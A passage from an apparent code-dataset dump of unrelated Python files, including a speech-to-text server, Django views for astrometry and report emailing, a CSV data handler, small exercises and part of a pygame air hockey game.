' +\n 'ex)python main.py --configfile examplecfg.cfg')\n self.args = parse_args(sys.argv[1])\n # set parameters from cfg file\n # give random seed\n self.random_seed = self.args.config.getint('common', 'random_seed')\n self.mx_random_seed = self.args.config.getint('common', 'mx_random_seed')\n # random seed for shuffling data list\n if self.random_seed != -1:\n np.random.seed(self.random_seed)\n # set mx.random.seed to give seed for parameter initialization\n if self.mx_random_seed != -1:\n mx.random.seed(self.mx_random_seed)\n else:\n mx.random.seed(hash(datetime.now()))\n # set log file name\n self.log_filename = self.args.config.get('common', 'log_filename')\n self.log = LogUtil(filename=self.log_filename).getlogger()\n\n # set parameters from data section(common)\n self.mode = self.args.config.get('common', 'mode')\n\n save_dir = 'checkpoints'\n model_name = self.args.config.get('common', 'prefix')\n max_freq = self.args.config.getint('data', 'max_freq')\n self.datagen = DataGenerator(save_dir=save_dir, model_name=model_name, max_freq=max_freq)\n self.datagen.get_meta_from_file(\n np.loadtxt(generate_file_path(save_dir, model_name, 'feats_mean')),\n np.loadtxt(generate_file_path(save_dir, model_name, 'feats_std')))\n\n self.buckets = json.loads(self.args.config.get('arch', 'buckets'))\n\n # get meta file where character to number conversions are defined\n\n self.contexts = parse_contexts(self.args)\n self.num_gpu = len(self.contexts)\n self.batch_size = self.args.config.getint('common', 'batch_size')\n # check the number of gpus is positive divisor of the batch size for data parallel\n self.is_batchnorm = self.args.config.getboolean('arch', 'is_batchnorm')\n self.is_bucketing = self.args.config.getboolean('arch', 'is_bucketing')\n\n # log current config\n self.config_logger = ConfigLogger(self.log)\n self.config_logger(self.args.config)\n\n default_bucket_key = 1600\n self.args.config.set('arch', 'max_t_count', str(default_bucket_key))\n self.args.config.set('arch', 'max_label_length', str(95))\n self.labelUtil = LabelUtil()\n is_bi_graphemes = self.args.config.getboolean('common', 'is_bi_graphemes')\n load_labelutil(self.labelUtil, is_bi_graphemes, language=\"zh\")\n self.args.config.set('arch', 'n_classes', str(self.labelUtil.get_count()))\n self.max_t_count = self.args.config.getint('arch', 'max_t_count')\n # self.load_optimizer_states = self.args.config.getboolean('load', 'load_optimizer_states')\n\n # load model\n self.model_loaded, self.model_num_epoch, self.model_path = load_model(self.args)\n\n # self.model = STTBucketingModule(\n # sym_gen=self.model_loaded,\n # default_bucket_key=default_bucket_key,\n # context=self.contexts\n # )\n\n from importlib import import_module\n prepare_data_template = import_module(self.args.config.get('arch', 'arch_file'))\n init_states = prepare_data_template.prepare_data(self.args)\n width = self.args.config.getint('data', 'width')\n height = self.args.config.getint('data', 'height')\n for bucket in self.buckets:\n net, init_state_names, ll = self.model_loaded(bucket)\n net.save('checkpoints/%s-symbol.json' % bucket)\n input_shapes = dict([('data', (self.batch_size, default_bucket_key, width * height))] + init_states + [('label',(1,18))])\n # self.executor = net.simple_bind(ctx=mx.cpu(), **input_shapes)\n\n # self.model.bind(data_shapes=[('data', (self.batch_size, default_bucket_key, width * height))] + init_states,\n # label_shapes=[\n # ('label', (self.batch_size, self.args.config.getint('arch', 'max_label_length')))],\n # 
for_training=True)\n\n symbol, self.arg_params, self.aux_params = mx.model.load_checkpoint(self.model_path, self.model_num_epoch)\n all_layers = symbol.get_internals()\n concat = all_layers['concat36457_output']\n sm = mx.sym.SoftmaxOutput(data=concat, name='softmax')\n self.executor = sm.simple_bind(ctx=mx.cpu(), **input_shapes)\n # self.model.set_params(self.arg_params, self.aux_params, allow_extra=True, allow_missing=True)\n\n for key in self.executor.arg_dict.keys():\n if key in self.arg_params:\n self.arg_params[key].copyto(self.executor.arg_dict[key])\n init_state_names.remove('data')\n init_state_names.sort()\n self.states_dict = dict(zip(init_state_names, self.executor.outputs[1:]))\n self.input_arr = mx.nd.zeros((self.batch_size, default_bucket_key, width * height))\n\n try:\n from swig_wrapper import Scorer\n\n vocab_list = [chars.encode(\"utf-8\") for chars in self.labelUtil.byList]\n self.log.info(\"vocab_list len is %d\" % len(vocab_list))\n _ext_scorer = Scorer(0.26, 0.1, self.args.config.get('common', 'kenlm'), vocab_list)\n lm_char_based = _ext_scorer.is_character_based()\n lm_max_order = _ext_scorer.get_max_order()\n lm_dict_size = _ext_scorer.get_dict_size()\n self.log.info(\"language model: \"\n \"is_character_based = %d,\" % lm_char_based +\n \" max_order = %d,\" % lm_max_order +\n \" dict_size = %d\" % lm_dict_size)\n self.eval_metric = EvalSTTMetric(batch_size=self.batch_size, num_gpu=self.num_gpu, is_logging=True,\n scorer=_ext_scorer)\n except ImportError:\n import kenlm\n km = kenlm.Model(self.args.config.get('common', 'kenlm'))\n self.eval_metric = EvalSTTMetric(batch_size=self.batch_size, num_gpu=self.num_gpu, is_logging=True,\n scorer=km.score)\n\n def forward(self, input_data, new_seq=False):\n if new_seq:\n for key in self.states_dict.keys():\n self.executor.arg_dict[key][:] = 0.\n input_data.copyto(self.executor.arg_dict[\"data\"])\n self.executor.forward()\n for key in self.states_dict.keys():\n self.states_dict[key].copyto(self.executor.arg_dict[key])\n prob = self.executor.outputs[0].asnumpy()\n return prob\n\n def getTrans(self, wav_file):\n res = spectrogram_from_file(wav_file, noise_percent=0)\n buck = bisect.bisect_left(self.buckets, len(res))\n bucket_key = 1600\n res = self.datagen.normalize(res)\n d = np.zeros((self.batch_size, bucket_key, res.shape[1]))\n d[0, :res.shape[0], :] = res\n st = time.time()\n # model_loaded.forward(data_batch, is_train=False)\n probs = self.forward(mx.nd.array(d))\n from stt_metric import ctc_greedy_decode\n res = ctc_greedy_decode(probs, self.labelUtil.byList)\n self.log.info(\"forward cost %.2f, %s\" % (time.time() - st, res))\n st = time.time()\n # model_loaded.update_metric(self.eval_metric, data_batch.label)\n self.log.info(\"update metric cost %.2f\" % (time.time() - st))\n # print(\"my res is:\")\n # print(eval_metric.placeholder)\n return self.eval_metric.placeholder\n\n\notherNet = Net()\n\nif __name__ == '__main__':\n server = HTTPServer(('', 8089), SimpleHTTPRequestHandler)\n print('Started httpserver on port')\n\n # Wait forever for incoming http requests\n server.serve_forever()\n","sub_path":"server3.py","file_name":"server3.py","file_ext":"py","file_size_in_byte":11707,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"233951496","text":"# track the largest item during insertion\n# the get_max operation needs to be O(1) running time\n# the memory complexity can be O(N) which means we can use another stack\n# in the implementation\n\n
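# (added note, not in the original) invariant for this technique: max_stack[i]\n# always equals max(stack[:i+1]), so the running maximum sits on top of\n# max_stack in O(1) and pop() must discard from both stacks together.\n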
class Stack:\n def __init__(self):\n self.stack = []\n self.max_stack = []\n\n def push(self, data):\n self.stack.append(data)\n\n if (len(self.stack) == 1):\n self.max_stack.append(data)\n return\n\n if (data > self.max_stack[-1]):\n self.max_stack.append(data)\n else:\n # if it's not the largest in the stack, we can duplicate the largest one into the max_stack\n self.max_stack.append(self.max_stack[-1])\n\n return self.stack\n \n def pop(self):\n # pop from both stacks so max_stack keeps mirroring the main stack\n last_item = self.stack[-1]\n del self.stack[-1]\n del self.max_stack[-1]\n return last_item\n\n def stack_size(self):\n return len(self.stack)\n\n def get_max(self):\n # O(1)\n return self.max_stack[-1]\n\nstack = Stack()\n\nstack.push(10)\nstack.push(5)\nstack.push(1)\nstack.push(122)\nstack.push(100)\nprint('stack size %d' % stack.stack_size())\n\nprint('max: %d' % stack.get_max())\n\n\n\n\n ","sub_path":"stacks/python/3_max_stack.py","file_name":"3_max_stack.py","file_ext":"py","file_size_in_byte":1140,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"72142278","text":"from setuptools import setup, find_packages\nfrom os import path\nfrom setuptools.extension import Extension\nfrom Cython.Build import cythonize\n\n\nhere = path.abspath(path.dirname(__file__))\n\n\nsetup(\n name = \"strut\",\n\n version = \"0.0\",\n\n description = \"STRUctural Toolkit\",\n\n author = \"H. Onur Solmaz\",\n\n author_email = \"onursolmaz@gmail.com\",\n\n packages = find_packages(exclude=[\"contrib\", \"docs\", \"tests\"]),\n\n extras_require = {\n \"dev\": [\"check-manifest\"],\n \"test\": [\"coverage\"],\n },\n\n # package_data={\n # \"sample\": [\"package_data.dat\"],\n # },\n\n # data_files=[(\"my_data\")],\n\n install_requires = {\n \"numpy\",\n \"scipy\",\n \"python-dateutil\",\n \"meshpy\",\n \"bs4\",\n # \"xmltodict\",\n },\n\n ext_modules = cythonize(\"strut/material_cython.pyx\"),\n\n entry_points = {\n \"console_scripts\": [\n \"moment_curvature_graph=strut.bin.moment_curvature_graph:__main__\",\n \"moment_force_graph=strut.bin.moment_force_graph:__main__\",\n ],\n },\n)\n\n\n\n","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1062,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"591338444","text":"\ndef reverse(encoding):\n revEncoding = {value: key for key, value in encoding.items()}\n return revEncoding\n\ndef encode(sequence):\n #Create an empty string for the encoding of the sequence\n encoded_string = ''\n\n #For each letter, append its encoding to the encoded string\n for letter in range(len(sequence)):\n encoded_string += encoding[sequence[letter]]\n return encoded_string\n\ndef decode(encoding):\n decoded = ''\n index = 0\n while index < len(encoding):\n if index + 2 <= len(encoding):\n if encoding[index: index + 2] in revEncoding:\n decoded += revEncoding[encoding[index: index +2]]\n index += 2\n if index + 1 <= len(encoding):\n if encoding[index: index + 1] in revEncoding:\n decoded += revEncoding[encoding[index: index +1]]\n index += 1\n return decoded\n\ndef combinations(seq):\n if len(seq) % 2 == 1:\n pairs = int((len(seq)/2) + 0.5)\n else:\n pairs = int((len(seq)/2))\n\n\n\nencoding = {'C' : '1', 'G' : '0', 'A' : '00', 'T': '01'}\nrevEncoding = reverse(encoding)\n\nprint(revEncoding)\n
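\n# (added worked example, not in the original) this encoding is not prefix-free:\n# encode('GG') == '00', but decode('00') greedily matches the two-bit code and\n# returns 'A', so decode(encode(s)) is not guaranteed to round-trip.\nseq = 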
encode('gataca'.upper())\nprint(seq)\nprint(decode(seq))\n","sub_path":"dna.py","file_name":"dna.py","file_ext":"py","file_size_in_byte":1276,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"237845242","text":"from django.http import HttpResponse\nfrom rest_framework.decorators import api_view\nfrom rest_framework import status\n\nfrom django.conf import settings\n\nfrom . import config\nfrom util import date_utils, csv_utils, mail_utils\nfrom clients import lynx_db_client\n\nlynx_client = lynx_db_client.client()\n\n\n@api_view(['POST'])\ndef update_weekly_tds_report_ad(request):\n weekly_tds = lynx_client.fetch_weekly_tds_data()\n weekly_tds_data = [\n {\"SellerIds\": data[0], \"NEFTIds\": data[1], \"SettlementAmount\": data[2], \"SettlementDate\": data[3],\n \"SettlementStatus\": data[4]} for data in weekly_tds]\n file_name = 'Weekly_tds_payout_from_%s_to_%s.csv' % (\n date_utils.get_previous_date(8), date_utils.get_previous_date(1))\n csv_utils.create_csv_from_list(config.tds_weekly_report_header, weekly_tds_data, file_name)\n mail_utils.send_mail_with_attachment(settings.TDS_TO_EMAIL,\n config.tds_weekly_report_subject % (\n date_utils.get_previous_date(8),\n date_utils.get_previous_date(1)),\n config.tds_weekly_report_mail_template,\n file_name)\n return HttpResponse(status=status.HTTP_204_NO_CONTENT)\n","sub_path":"sp-ssm-hercules/tds/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1328,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"403692540","text":"from django.conf import settings\nfrom django.core.urlresolvers import reverse\nfrom django.core.exceptions import ObjectDoesNotExist\nfrom django.http import JsonResponse, HttpResponseRedirect\nfrom django.shortcuts import redirect, render_to_response\nfrom django.template import RequestContext\nfrom django.utils.dateparse import parse_datetime\n\nfrom astrometry.util import create_new_lightcurve\n\nfrom astrometry.models import AstrometrySubmission, AstrometrySubmissionJob\nfrom imageflow.models import ImageAnalysis, ImageFilter, Reduction, UserUploadedImage\n\ndef index(request):\n return render_to_response('index.html', context_instance=RequestContext(request))\n\ndef upload_image(request):\n if request.user.is_authenticated():\n if request.method == 'POST':\n imgs = [request.FILES[key] for key in request.FILES]\n lightcurve = create_new_lightcurve(request.user, imgs)\n\n # Redirect to submission viewing page.\n return JsonResponse({\n 'details': 'success',\n 'redirect_url': reverse('edit_lightcurve', kwargs={'lightcurve_id': lightcurve.id}),\n })\n\n return render_to_response('upload_image.html', {},\n context_instance=RequestContext(request))\n else:\n return HttpResponseRedirect(reverse('login'))\n\ndef astrometry(request, subid):\n # TODO(ian): Look up submission and view status.\n # TODO(ian): Handle failed Analysis Result.\n try:\n result = ImageAnalysis.objects.exclude( \\\n status=ImageAnalysis.PENDING).get( \\\n astrometry_job__submission__subid=subid)\n except ObjectDoesNotExist:\n return render_to_response('submission_pending.html', {},\n context_instance=RequestContext(request))\n\n template_args = {\n 'result': result.get_summary_obj(),\n 'image_filters': ImageFilter.objects.all(),\n }\n return render_to_response('submission.html', template_args,\n context_instance=RequestContext(request))\n\ndef set_datetime(request, subid):\n try:\n result = 
ImageAnalysis.objects.exclude(status=ImageAnalysis.PENDING) \\\n .get(astrometry_job__submission__subid=subid)\n except ObjectDoesNotExist:\n return JsonResponse({\n 'success': False,\n 'msg': 'Could not find corresponding ImageAnalysis',\n })\n\n # Set new datetime.\n try:\n parsed_dt = parse_datetime(request.POST.get('val'))\n except ValueError:\n return JsonResponse({\n 'success': False,\n 'msg': 'Invalid datetime',\n })\n\n if not parsed_dt:\n return JsonResponse({\n 'success': False,\n 'msg': 'Could not parse datetime',\n })\n\n result.image_datetime = parsed_dt\n result.save()\n\n return JsonResponse({\n 'success': True,\n 'msg': 'Resolved input to %s' % parsed_dt.isoformat()\n })\n\ndef set_target_point_source(request, subid):\n try:\n analysis = ImageAnalysis.objects.exclude(status=ImageAnalysis.PENDING) \\\n .get(astrometry_job__submission__subid=subid)\n except ObjectDoesNotExist:\n raise ValueError('Could not find corresponding ImageAnalysis')\n\n analysis.target_id = request.POST.get('val')\n analysis.save()\n return JsonResponse({\n 'success': True,\n })\n\ndef set_filter_band(request, subid):\n analysis, filter_band = resolve_band(request, subid)\n analysis.image_filter = filter_band\n analysis.save()\n return JsonResponse({\n 'success': True,\n 'msg': 'Resolved input to %s' % str(filter_band)\n })\n\ndef set_color_index_1(request, subid):\n analysis, filter_band = resolve_band(request, subid)\n analysis.get_or_create_reduction()\n analysis.reduction.color_index_1 = filter_band\n analysis.reduction.save()\n return JsonResponse({\n 'success': True,\n 'msg': 'Resolved input to %s' % str(filter_band)\n })\n\ndef set_color_index_2(request, subid):\n analysis, filter_band = resolve_band(request, subid)\n analysis.get_or_create_reduction()\n analysis.reduction.color_index_2 = filter_band\n analysis.reduction.save()\n return JsonResponse({\n 'success': True,\n 'msg': 'Resolved input to %s' % str(filter_band)\n })\n\ndef set_image_companion(request, subid):\n try:\n analysis = ImageAnalysis.objects.exclude(status=ImageAnalysis.PENDING) \\\n .get(astrometry_job__submission__subid=subid)\n except ObjectDoesNotExist:\n raise ValueError('Could not find corresponding ImageAnalysis')\n analysis.get_or_create_reduction()\n\n imageid = request.POST.get('val')\n analysis.reduction.image_companion = UserUploadedImage.objects.get(pk=imageid)\n analysis.reduction.save()\n return JsonResponse({\n 'success': True,\n 'msg': 'Resolved input'\n })\n\ndef resolve_band(request, subid):\n try:\n analysis = ImageAnalysis.objects.exclude(status=ImageAnalysis.PENDING) \\\n .get(astrometry_job__submission__subid=subid)\n except ObjectDoesNotExist:\n raise ValueError('Could not find corresponding ImageAnalysis')\n\n band = request.POST.get('val')\n if not band:\n raise ValueError('Filter band not specified')\n\n try:\n filter_band = ImageFilter.objects.get(band=band)\n except ObjectDoesNotExist:\n raise ValueError('Invalid filter band')\n\n return analysis, filter_band\n\ndef set_elevation(request, subid):\n return set_float(request, subid, 'image_elevation')\n\ndef set_latitude(request, subid):\n return set_float(request, subid, 'image_latitude')\n\ndef set_longitude(request, subid):\n return set_float(request, subid, 'image_longitude')\n\ndef set_second_order_extinction(request, subid):\n try:\n analysis = ImageAnalysis.objects.exclude(status=ImageAnalysis.PENDING) \\\n .get(astrometry_job__submission__subid=subid)\n except ObjectDoesNotExist:\n return JsonResponse({\n 'success': False,\n 'msg': 'Could not find corresponding 
ImageAnalysis',\n })\n analysis.get_or_create_reduction()\n return set_float(request, subid, 'second_order_extinction', on_reduction=True)\n\ndef set_float(request, subid, attrname, on_reduction=False):\n try:\n analysis = ImageAnalysis.objects.exclude(status=ImageAnalysis.PENDING) \\\n .get(astrometry_job__submission__subid=subid)\n except ObjectDoesNotExist:\n return JsonResponse({\n 'success': False,\n 'msg': 'Could not find corresponding ImageAnalysis',\n })\n\n try:\n val = float(request.POST.get('val'))\n except ValueError:\n return JsonResponse({\n 'success': False,\n 'msg': 'Could not parse as float',\n })\n\n if on_reduction:\n setattr(analysis.reduction, attrname, val)\n analysis.reduction.save()\n else:\n setattr(analysis, attrname, val)\n analysis.save()\n\n return JsonResponse({\n 'success': True,\n })\n\ndef set_reduction_status(request, subid):\n # TODO(ian): Verify owner of reduction for all these ImageAnalysis fetches.\n try:\n analysis = ImageAnalysis.objects.exclude(status=ImageAnalysis.PENDING) \\\n .get(astrometry_job__submission__subid=subid)\n except ObjectDoesNotExist:\n return JsonResponse({\n 'success': False,\n 'msg': 'Could not find corresponding ImageAnalysis',\n })\n reduction = analysis.get_or_create_reduction()\n reduction.status = Reduction.PENDING\n reduction.save()\n return JsonResponse({\n 'success': True,\n 'message': 'Reduction status set to pending',\n })\n\ndef get_reduction_status(request, subid):\n try:\n analysis = ImageAnalysis.objects.exclude(status=ImageAnalysis.PENDING) \\\n .get(astrometry_job__submission__subid=subid)\n except ObjectDoesNotExist:\n return JsonResponse({\n 'success': False,\n 'msg': 'Could not find corresponding ImageAnalysis',\n })\n reduction = analysis.get_or_create_reduction()\n return JsonResponse({\n 'success': True,\n 'status': reduction.status,\n })\n\ndef point_sources(request, subid):\n # TODO(ian): Dedup this with above code.\n try:\n result = ImageAnalysis.objects.exclude(status=ImageAnalysis.PENDING) \\\n .get(astrometry_job__submission__subid=subid)\n except ObjectDoesNotExist:\n return render_to_response('submission_pending.html', {},\n context_instance=RequestContext(request))\n\n template_args = {\n 'result': result.get_summary_obj(),\n }\n return render_to_response('point_sources.html', template_args,\n context_instance=RequestContext(request))\n\ndef reference_stars(request, subid):\n # TODO(ian): Dedup this with above code.\n try:\n result = ImageAnalysis.objects.exclude(status=ImageAnalysis.PENDING) \\\n .get(astrometry_job__submission__subid=subid)\n except ObjectDoesNotExist:\n return render_to_response('submission_pending.html', {},\n context_instance=RequestContext(request))\n\n template_args = {\n 'result': result.get_summary_obj(),\n 'image_filters': ImageFilter.objects.all(),\n }\n return render_to_response('reference_stars.html', template_args,\n context_instance=RequestContext(request))\n\ndef reduction(request, subid):\n # TODO(ian): Dedup this with above code.\n try:\n analysis = ImageAnalysis.objects.exclude(status=ImageAnalysis.PENDING) \\\n .get(astrometry_job__submission__subid=subid)\n except ObjectDoesNotExist:\n return render_to_response('submission_pending.html', {},\n context_instance=RequestContext(request))\n\n # Other images in this light curve.\n image_companions = analysis.lightcurve.useruploadedimage_set.all()\n\n template_args = {\n 'result': analysis.get_summary_obj(),\n 'image_filters': ImageFilter.objects.all(),\n\n 'image_companions': image_companions,\n }\n if 
hasattr(analysis, 'reduction') and analysis.reduction:\n template_args.update({\n 'reduction': analysis.reduction.get_summary_obj(),\n })\n return render_to_response('reduction.html', template_args,\n context_instance=RequestContext(request))\n else:\n template_args.update({\n 'no_reduction': True\n })\n return render_to_response('reduction.html', template_args,\n context_instance=RequestContext(request))\n\ndef add_to_light_curve(request, subid):\n return 'not yet implemented'\n\ndef light_curve(request, subid):\n # TODO(ian): Dedup this with above code.\n try:\n result = ImageAnalysis.objects.exclude(status=ImageAnalysis.PENDING) \\\n .get(astrometry_job__submission__subid=subid)\n except ObjectDoesNotExist:\n return render_to_response('submission_pending.html', {},\n context_instance=RequestContext(request))\n\n template_args = {\n 'result': result.get_summary_obj(),\n }\n return render_to_response('light_curve.html', template_args,\n context_instance=RequestContext(request))\n\ndef api_get_submission_results(request, subid):\n try:\n result = ImageAnalysis.objects.exclude(status=ImageAnalysis.PENDING) \\\n .get(astrometry_job__submission__subid=subid)\n except ObjectDoesNotExist:\n return JsonResponse({\n 'success': False,\n 'message': 'Result not found.',\n })\n\n return JsonResponse({\n 'success': True,\n 'result': result.get_summary_obj(),\n })\n","sub_path":"imageflow/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":11949,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"73628360","text":"#!/usr/bin/env python\n\n# Library: pyLAR\n#\n# Copyright 2014 Kitware Inc. 28 Corporate Drive,\n# Clifton Park, NY, 12065, USA.\n#\n# All rights reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\n\"\"\" Load a given input image, and then separate the low\nrank from the sparse (corrupted) part using Candes et al., 2011\nformulation of RPCA, solved via IALM.\n\nCAUTION: only grayscale images are supported at this point.\n\"\"\"\n\n\nimport sys\nimport numpy as np\nimport SimpleITK as sitk\nimport pyLAR.alm.ialm as ialm\nimport argparse\n\n\ndef main(argv=None):\n \"\"\"Parsing command line arguments and reading input files.\"\"\"\n if argv is None:\n argv = sys.argv\n parser = argparse.ArgumentParser(\n prog=argv[0],\n description=__doc__\n )\n parser.add_argument('-i', \"--inputImage\", required=True,\n help=\"Input image on which low-rank decomposition is computed\")\n parser.add_argument('-l', \"--lowRank\", required=True, help=\"Low-rank output image\")\n parser.add_argument('-s', \"--Sparse\", required=True,\n help=\"Sparse output image\")\n args = parser.parse_args(argv[1:])\n\n # read image\n I = sitk.ReadImage(args.inputImage)\n # data for processing\n X = sitk.GetArrayFromImage(I)\n\n # decompose X into L+S\n L, S, _, _, _, _ = ialm.recover(X)\n\n L_image = sitk.GetImageFromArray(np.asarray(L, dtype=np.uint8))\n sitk.WriteImage(L_image, args.lowRank, True)\n S_image = sitk.GetImageFromArray(np.asarray(S, 
dtype=np.uint8))\n sitk.WriteImage(S_image, args.Sparse, True)\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"run_LR_one_image.py","file_name":"run_LR_one_image.py","file_ext":"py","file_size_in_byte":2102,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"224077762","text":"import os.path\n\n\nclass DataMover:\n FIRST_LINE_IN_DONOR = \"id,name,weight,gender,date_of_birth,last_donation,last_month_sickness,unique_identifier,expiration_of_id,blood_type,hemoblogin, email, mobile, is_valid\\n\"\n FIRST_LINE_IN_DONATION =\"id,date_of_event,start_time,end_time,zip_code,city,address,number_of_beds,planned_donor_number,final_donor_number\\n\"\n FILE_PATH = \"Data\\\\\"\n special_caracter = \"#\"\n\n def data_reader(self, file_name, start_index):\n result_list = []\n if os.path.exists(self.FILE_PATH + file_name):\n f = open(self.FILE_PATH + file_name, \"r\")\n else:\n print(\"The file is empty.\")\n self.create_file(file_name)\n return\n for line in f:\n result_list.append(self.convert_to_list(line))\n f.close()\n return result_list[start_index:]\n\n def data_writer(self, file_name, data_object, open_mode):\n if not os.path.exists(self.FILE_PATH + file_name):\n self.create_file(file_name)\n index = self.generate_id(file_name)\n with open(self.FILE_PATH + file_name, open_mode) as f:\n f.write(self.writer_converter(data_object, index))\n return\n\n def writer_converter(self, data_object, index):\n lista = \"\"\n for i in range(len(data_object)):\n if data_object[i] == \"-\":\n data_object[i] = \"no\"\n if i == 0 and not data_object[i].isdigit() and data_object[0] != \"id\":\n lista += \"{0},\".format(str(index))\n if i != len(data_object) - 1:\n if \",\" in data_object[i]:\n data_object[i] = '\"{0}\"'.format(data_object[i])\n lista += \"{0},\".format(str(data_object[i]))\n continue\n lista += \"{0},\".format(str(data_object[i]))\n else:\n if \",\" in data_object[i]:\n data_object[i] = '\"{0}\"'.format(data_object[i])\n lista += \"{0}\\n\".format(str(data_object[i]))\n continue\n lista += \"{0}\\n\".format(str(data_object[i]))\n return lista\n\n def create_file(self, file_name):\n f = open(self.FILE_PATH + file_name, \"w\")\n if file_name == \"donors.csv\":\n f.writelines(self.FIRST_LINE_IN_DONOR)\n else:\n f.writelines(self.FIRST_LINE_IN_DONATION)\n f.close()\n return\n\n def converted_reader(self, line):\n line_string = \"\"\n quotation_marks_number = 0\n result_list = \"\"\n for c in range(len(line)):\n if line[c] == '\"':\n if quotation_marks_number == 0:\n quotation_marks_number += 1\n elif quotation_marks_number == 1:\n quotation_marks_number = 0\n if line[c] == \",\" and quotation_marks_number == 1:\n line_string += self.special_caracter\n else:\n line_string += line[c]\n result_list = line_string.replace(\"\\n\",\"\").split(\",\")\n return result_list\n\n def deconverted_reader(self, data_list):\n result_list = []\n for i in range(len(data_list)):\n if self.special_caracter in str(data_list[i]):\n data_list[i] = str(data_list[i]).replace(self.special_caracter, \",\")\n result_list.append(data_list)\n return result_list\n\n def convert_to_list(self, line):\n if '\"' in line:\n result_list = self.converted_reader(line)\n result_list = self.deconverted_reader(result_list)\n else:\n result_list = line.replace(\"\\n\", \"\").split(\",\")\n return result_list\n\n def generate_id(self, file_name):\n data_list = self.data_reader(file_name, 0)\n if len(data_list) == 1:\n index = 1\n else:\n index = data_list[len(data_list)-1][0]\n index = 
int(index)\n index += 1\n return index\n","sub_path":"project/program_units/data_mover.py","file_name":"data_mover.py","file_ext":"py","file_size_in_byte":3954,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"261183400","text":"#!/usr/bin/env python2\r\n\r\nimport pygame\r\nimport sys\r\nimport os\r\nfrom pygame.locals import *\r\nfrom gameObjects import *\r\nfrom startScreen import airHockeyStart\r\n\r\n# setting logo should take place before setting the display on some OS\r\ngamelogo = pygame.image.load(os.path.join(os.path.dirname(__file__),'img/AHlogo.png'))\r\npygame.display.set_icon(gamelogo)\r\n\r\npygame.init()\r\nclock = pygame.time.Clock()\r\nscreen = pygame.display.set_mode((1200, 600))\r\n\r\n\r\n# Window title and Caption\r\npygame.display.set_caption('Air Hockey')\r\n\r\n# screen height and width\r\nheight = screen.get_height()\r\nwidth = screen.get_width()\r\n\r\n# Create Game Objects\r\npaddleVelocity = 10\r\npaddleSize = 40\r\npuckSize = 35\r\n\r\npaddle1 = Paddle(22, height / 2, paddleSize, paddleVelocity)\r\npaddle2 = Paddle(width - 20, height / 2, paddleSize, paddleVelocity)\r\n\r\n\r\ndivider = pygame.Rect(width / 2, 0, 3, height)\r\nscreenColor = (224, 214, 141)\r\n\r\n# Score\r\nscore1, score2 = 0, 0\r\n\r\nsmallfont=pygame.font.SysFont(\"comicsansms\",35)\r\nblack =(0,0,0)\r\ndef score(score1,score2):\r\n text1 =smallfont.render(\"Score1: \"+str(score1), True ,black)\r\n text2 =smallfont.render(\"Score2: \"+str(score2), True ,black)\r\n\r\n screen.blit(text1, [40,0])\r\n screen.blit(text2,[ width-150,0])\r\n\r\n\r\ndef renderPlayingArea():\r\n # Render Logic\r\n\r\n screen.fill(screenColor)\r\n\r\n # center circle\r\n pygame.draw.circle(screen, (255, 255, 255),\r\n (width / 2, height / 2), 70, 5)\r\n\r\n # borders\r\n pygame.draw.rect(screen, (255, 255, 255), (0, 0, width, height), 5)\r\n\r\n # D-box\r\n pygame.draw.rect(screen, (255, 255, 255), (0, height / 2 - 150, 150, 300), 5)\r\n pygame.draw.rect(screen, (255, 255, 255), (width -\r\n 150, height / 2 - 150, 150, 300), 5)\r\n\r\n # goals\r\n pygame.draw.rect(screen, (0, 0, 0), (0, height / 2 - 90, 5, 180))\r\n pygame.draw.rect(screen, (0, 0, 0), (width-5, height / 2 - 90, 5, 180))\r\n\r\n pygame.draw.rect(screen, (255, 255, 255), divider)\r\n\r\n\r\n# Game Loop\r\ndef gameLoop(vel):\r\n puckVelocity = [vel, vel]\r\n puck = Puck(width / 2, height / 2, puckSize, puckVelocity)\r\n while True:\r\n for event in pygame.event.get():\r\n if event.type == QUIT:\r\n sys.exit()\r\n\r\n global score1, score2\r\n w, s, up, down, d, a, right, left = 0, 0, 0, 0, 0, 0, 0, 0\r\n\r\n\r\n\r\n\r\n\r\n print (\"score1: \"+str(score1))\r\n print (\"score2: \"+str(score2))\r\n # Process Player 1 Input\r\n w = pygame.key.get_pressed()[pygame.K_w]\r\n s = pygame.key.get_pressed()[pygame.K_s]\r\n d = pygame.key.get_pressed()[pygame.K_d]\r\n a = pygame.key.get_pressed()[pygame.K_a]\r\n\r\n # Process Player 2 Input\r\n up = pygame.key.get_pressed()[pygame.K_UP]\r\n down = pygame.key.get_pressed()[pygame.K_DOWN]\r\n right = pygame.key.get_pressed()[pygame.K_RIGHT]\r\n left = pygame.key.get_pressed()[pygame.K_LEFT]\r\n\r\n # Update Logic\r\n\r\n # Update Paddle1\r\n paddle1.y += (s - w) * paddleVelocity\r\n paddle1.x += (d - a) * paddleVelocity\r\n paddle1.checkTopBottomBounds(height)\r\n paddle1.checkLeftBoundary(width)\r\n\r\n # Update Paddle2\r\n paddle2.y += (down - up) * paddleVelocity\r\n paddle2.x += (right - left) * paddleVelocity\r\n paddle2.checkTopBottomBounds(height)\r\n 
